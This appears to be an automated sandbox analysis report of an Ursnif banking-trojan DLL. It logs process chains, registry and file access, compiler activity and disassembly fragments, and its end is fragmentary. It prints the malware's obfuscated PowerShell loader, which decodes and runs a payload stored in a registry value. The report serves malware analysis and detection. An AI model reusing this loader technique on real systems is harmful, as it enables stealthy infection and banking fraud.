Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\yytr.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6556 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5988 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4596 CREDAT:82956 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESCC08.tmp' 'c:\Users\user\AppData\Local\Temp\qxfma03s\CSC9A61D8937933426B894F97C05C536C75.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDFCF.tmp' 'c:\Users\user\AppData\Local\Temp\maejgtwh\CSC5E7D34BFE3B047248BD36616B57FD91.TMP'
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\System32\control.exe	Process created: unknown unknown

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: powrprof.pdbG source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdb source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: version.pdb{ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb} source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: combase.pdbQ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: msvcp_win.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000021.00000002.845354069.000001CB4A4D0000.00000002.00000001.sdmp, csc.exe, 00000023.00000002.855076730.000002D3EE650000.00000002.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: fltLib.pdbM source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: mpr.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: setupapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdbe source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: imagehlp.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000004.00000003.646920068.000000000315F000.00000004.00000001.sdmp
Source:	Binary string: shcore.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: winspool.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: oleaut32.pdbc source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdbXPS source: powershell.exe, 0000001E.00000002.910551161.0000026F5EBFA000.00000004.00000001.sdmp
Source:	Binary string: propsys.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb_ source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ucrtbase.pdbk source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: msctf.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: version.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: AcLayers.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdbi source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc_os.pdbGX source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
Source:	Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
Source:	Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
Source:	Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
Source:	Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').Barclers))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.cmdline'

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0042743C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0042743C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00453E60 push 00453EEDh; ret	0_2_00453EE5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00406040 push 0040606Ch; ret	0_2_00406064
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_004160F0 push ecx; mov dword ptr [esp], edx	0_2_004160F5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00418174 push ecx; mov dword ptr [esp], ecx	0_2_00418179
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00414104 push 00414151h; ret	0_2_00414149
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00416134 push ecx; mov dword ptr [esp], edx	0_2_00416139
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_004143CF push 004144A8h; ret	0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0041447C push 004144A8h; ret	0_2_004144A0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00428404 push 0042845Dh; ret	0_2_00428455
Source: C:\Windows\

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report yytr.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation: